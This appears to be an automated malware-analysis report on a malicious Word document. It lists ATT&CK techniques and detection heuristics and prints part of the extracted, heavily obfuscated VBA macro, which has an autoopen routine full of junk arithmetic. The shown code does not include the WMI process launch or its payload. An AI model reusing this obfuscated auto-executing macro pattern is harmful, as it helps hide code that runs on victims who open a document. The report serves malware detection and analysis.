Verdict: MALICIOUS
Risk score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, a common technique for executing malicious code upon document opening. Heuristics indicate the macro attempts to launch a process via WMI, a strong indicator of a downloader or initial execution stage for further malicious activity. The macro's obfuscated nature and lack of clear indicators prevent definitive family attribution.
Heuristics (7):
- ClamAV: Doc.Malware.00536d-6943632-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6943632-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into documents, not a host the macro contacts.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30015 bytes |

SHA-256 of macros.bas: 70e8118aeb210c758c1f8a6f4aa0aacac7980b5509b141a57ac6eb3b14b1411c
Preview script: first 1,000 lines of the extracted script (the report truncates the listing below).

```vba
Attribute VB_Name = "WDBAAA4"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ZDU1Q1"
Attribute VB_Base = "0{ECFEBDF2-A4C9-4A6D-8618-A69D3DB9A0E3}{97EE3BAE-D7DF-4A3C-9624-BDC78D967FBC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "B4AowU"
Attribute VB_Base = "0{6810929F-D14A-4679-84B7-21949FB0FEC1}{3897C71E-CF72-4D7D-86A4-F2E046B6B3E7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zUAQ4A"
Sub autoopen()
If ZAkBU44c = qAA_wA Then
Select Case W1ZokAAA
Case 593450686
kZXUA_AA = Rnd(c4ABDAA + 538166895 + 137416323 / RAACw4k)
TxwXxG = CByte(PcAoXX + 892301361 + AQADA_ww + 363093825)
Case 705494804
KBQCUwQD = ixUAkAGA
MD4DCAB = Tan(zAcQ1DAQ - CSng(wDAUADAU))
End Select
End If
If zUAkBo = fBQXAC Then
Select Case rkQQA4oA
Case 185364164
QUcD_B = Rnd(joAQQ_A + 185009137 + 416626336 / jUU4kQXA)
a1CDBk4 = CByte(QDUUcoU4 + 232461170 + W_AAAA4k + 869468825)
Case 329522901
TAkBZA = XBGABA
lUAC1_Cx = Tan(zwQZAAxA - CSng(u1oAQx))
End Select
End If
T4AZAoQw
If BBAG4UwZ = i1AADG_A Then
Select Case zoZADA
Case 509154732
wCAAQA = Rnd(i4AQACAk + 854682617 + 799799859 / LAAZ1AAA)
sowUAx = CByte(Z4ACoAC + 474373553 + oxZAAkoo + 165431398)
Case 306558389
vUAAAB = HAADAZAA
cAAwAw = Tan(XkQAB_C_ - CSng(a4ADAD))
End Select
End If
If HBUQABB = PAAwAAAZ Then
Select Case PADAX_AA
Case 451740081
oGcADA = Rnd(TADxAAA + 105716578 + 768196766 / V4QAQZA)
OAAUQAQ = CByte(QAAAAQ + 483428642 + CAxDxA + 791235694)
Case 959383350
fAAxAZ1x = MUoQBAUA
NBA_xCZA = Tan(fBDQQA - CSng(uwAZCQQA))
End Select
End If
If jBxc1A = pkoBoQo Then
Select Case KcAXAAA1
Case 827255606
DQxGAGx = Rnd(EADA44o + 934896956 + 257997975 / JD_BBkkZ)
k_B4BAkX = CByte(nA_AoA + 406858684 + tkAGAXc + 285010593)
Case 157287028
bZAADBwA = nA_Akx4
hUQCwoGQ = Tan(dACDoUA - CSng(WxGAQckD))
End Select
End If
End Sub
Attribute VB_Name = "iDAABAx"
Function T4AZAoQw()
On Error Resume Next
If fkBZA_Q = R1A_AoB Then
Select Case FD1ZAkB
Case 322947399
rAZZQA = Rnd(qADQBQ + 554331145 + 852442958 / oQDc4x)
MD1AAZU = CByte(kBQXAA + 885726080 + LQQACCZ + 631572621)
Case 547336209
sAZBxDAU = tBxABx
jD_CcQ = Tan(ZADAxCZG - CSng(SCXADXA))
End Select
End If
If QAACQxc = rkBw1BB Then
Select Case nccD1D
Case 663204760
iDAQUBAU = Rnd(sUAQko + 557920055 + 185975153 / LZAA_A)
zCQ1QAA = CByte(CUAAAB + 701394531 + Zwo_AAQc + 615701302)
Case 187010394
PABAAA = fk_GGZ_
QAXcBB = Tan(YwAQAQA - CSng(mDoc_k))
End Select
End If
If 3473 < 74509 Then
UcAAAw = vbFalse
If NxUADAA = kAGDAB4A Then
Select Case CAX1AoD
Case 759028570
tAUXBB = Rnd(EAUCAAc + 377013198 + 855802813 / iAUZQ1)
kGAxcA = CByte(tAZA_ADA + 831988881 + WxADxD + 469273452)
Case 40108950
QAow_AB = VwxXDADX
qAGBXAAD = Tan(iQUAZB - CSng(icZwkAQ))
End Select
End If
If FUBABB = zAQUBAAo Then
Select Case BxkDAUAA
Case 231361184
... (truncated)
```